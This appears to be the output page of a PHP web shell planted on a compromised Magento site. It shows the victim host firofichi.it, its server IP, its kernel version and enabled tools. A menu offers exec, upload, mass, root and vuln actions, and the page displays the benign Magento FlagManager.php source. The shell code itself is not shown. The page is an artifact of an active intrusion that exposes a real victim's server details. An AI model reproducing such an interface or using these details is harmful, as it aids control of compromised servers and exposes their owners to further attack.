Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 52.15.52.31 | Time @ Server : 19 Oct 2024 02:32:36
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/magento/framework/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/magento/framework/FlagManager.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework; use Magento\Framework\Flag\FlagResource; /** * Service that allows to handle a flag object as a scalar value. */ class FlagManager { /** * The factory of flags. * * @var FlagFactory * @see Flag */ private $flagFactory; /** * The flag resource. * * @var FlagResource */ private $flagResource; /** * * @param FlagFactory $flagFactory The factory of flags * @param FlagResource $flagResource The flag resource */ public function __construct( FlagFactory $flagFactory, FlagResource $flagResource ) { $this->flagFactory = $flagFactory; $this->flagResource = $flagResource; } /** * Retrieves raw data from the flag. * * @param string $code The code of flag * @return string|int|float|bool|array|null */ public function getFlagData($code) { return $this->getFlagObject($code)->getFlagData(); } /** * Saves the flag value by code. * * @param string $code The code of flag * @param string|int|float|bool|array|null $value The value of flag * @return bool */ public function saveFlag($code, $value) { $flag = $this->getFlagObject($code); $flag->setFlagData($value); $this->flagResource->save($flag); return true; } /** * Deletes the flag by code. * * @param string $code The code of flag * @return bool */ public function deleteFlag($code) { $flag = $this->getFlagObject($code); if ($flag->getId()) { $this->flagResource->delete($flag); } return true; } /** * Returns flag object * * @param string $code * @return Flag */ private function getFlagObject($code) { /** @var Flag $flag */ $flag = $this->flagFactory->create(['data' => ['flag_code' => $code]]); $this->flagResource->load( $flag, $code, 'flag_code' ); return $flag; } }